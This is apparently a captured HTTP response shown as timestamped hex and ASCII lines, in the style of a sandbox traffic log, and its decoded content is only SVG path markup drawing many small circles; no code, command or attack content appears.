                                                                                                                                                                              2023-09-15 05:27:48 UTC4979INData Raw: 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 38 2c 34 32 35 2e 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35
                                                                                                                                                                              Data Ascii: ="cls-9" d="M757.78,425.4a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.5
                                                                                                                                                                              2023-09-15 05:27:48 UTC4995INData Raw: 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32
                                                                                                                                                                              Data Ascii: ,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2
                                                                                                                                                                              2023-09-15 05:27:48 UTC5011INData Raw: 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                              Data Ascii: 12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class=
                                                                                                                                                                              2023-09-15 05:27:48 UTC5027INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 34 37 2e 38 32 2c 32 31 37 2e 38 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30
                                                                                                                                                                              Data Ascii: ,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M847.82,217.86a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0
                                                                                                                                                                              2023-09-15 05:27:49 UTC5043INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 32 35 2c 33 31 33 2e 36 35 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                              Data Ascii: class="cls-9" d="M882.25,313.65a2.15,2.15,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.
                                                                                                                                                                              2023-09-15 05:27:49 UTC5059INData Raw: 39 22 20 64 3d 22 4d 39 31 36 2e 36 37 2c 34 30 39 2e 34 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32
                                                                                                                                                                              Data Ascii: 9" d="M916.67,409.45a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2
                                                                                                                                                                              2023-09-15 05:27:49 UTC5075INData Raw: 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e
                                                                                                                                                                              Data Ascii: 4,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path>
                                                                                                                                                                              2023-09-15 05:27:49 UTC5091INData Raw: 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37
                                                                                                                                                                              Data Ascii: a3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67.05,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M49.77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7
                                                                                                                                                                              2023-09-15 05:27:49 UTC5107INData Raw: 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c
                                                                                                                                                                              Data Ascii: 1-4.23-1.19,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path cl
                                                                                                                                                                              2023-09-15 05:27:49 UTC5123INData Raw: 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 30 2e 31 32 2c 31 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e
                                                                                                                                                                              Data Ascii: .62"></path><path class="cls-7" d="M110.12,162a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.
                                                                                                                                                                              2023-09-15 05:27:49 UTC5139INData Raw: 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 39 2e 30 37 2c 32 35 37 2e 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c
                                                                                                                                                                              Data Ascii: cls-7" d="M149.07,257.39a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,
                                                                                                                                                                              2023-09-15 05:27:49 UTC5155INData Raw: 2e 37 38 2c 31 30 37 2e 32 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c
                                                                                                                                                                              Data Ascii: .78,107.24a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,
                                                                                                                                                                              2023-09-15 05:27:49 UTC5171INData Raw: 37 32 2c 32 30 32 2e 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                              Data Ascii: 72,202.6a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3
                                                                                                                                                                              2023-09-15 05:27:49 UTC5187INData Raw: 2c 32 39 38 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c
                                                                                                                                                                              Data Ascii: ,298a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,
                                                                                                                                                                              2023-09-15 05:27:49 UTC5203INData Raw: 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c
                                                                                                                                                                              Data Ascii: 0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,
                                                                                                                                                                              2023-09-15 05:27:49 UTC5219INData Raw: 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22
                                                                                                                                                                              Data Ascii: 1,2.83,3.18,3.18,0,0,1-4.22-1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"
                                                                                                                                                                              2023-09-15 05:27:49 UTC5235INData Raw: 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                                                              Data Ascii: 19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path
